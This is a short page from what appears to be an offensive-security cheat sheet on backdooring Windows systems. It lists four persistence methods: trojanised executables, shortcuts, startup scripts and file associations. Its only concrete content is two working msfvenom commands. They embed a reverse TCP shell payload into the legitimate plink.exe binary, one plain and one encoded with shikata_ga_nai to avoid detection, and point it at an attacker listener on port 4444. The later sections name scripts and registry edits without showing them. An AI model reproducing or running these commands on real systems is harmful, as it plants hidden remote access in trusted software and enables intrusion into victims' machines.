Edit

Backdoors

Backdoor Cheat Sheet

Methods

  1. Creating EXE Files

  2. Backdooring Shortcuts

  3. Startup Scripts

  4. Backdooring file associations

Create an EXE file

msfvenom

# Without encoding
sudo msfvenom -a x64 --platform windows -x /usr/share/windows-binaries/plink.exe -k -p windows/x64/shell_reverse_tcp LHOST=192.168.56.20 LPORT=4444 -b "\x00" -f exe -o plink-malicious.exe

# With encoding
sudo msfvenom -a x64 --platform windows -x /usr/share/windows-binaries/plink.exe -k -p windows/x64/shell_reverse_tcp LHOST=192.168.56.20 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -i 4 -f exe -o plink-malicious.exe

Backdooring Shortcuts

Powershell

script.ps1

Modify the shortcut properties

Startup Scripts

Registry Editor

Backdooring file associations

backdoor.ps1

Registry Editor

REFERENCES

  • https://devblogs.microsoft.com/powershell/how-to-access-or-modify-startup-items-in-the-window-registry/

  • https://app.tidalcyber.com/technique/9cfbe3ba-957e-49fd-9494-9870e5d0ae16

PreviousUser Accounts, Hash Cracking, RID HijackingNextServices

Was this helpful?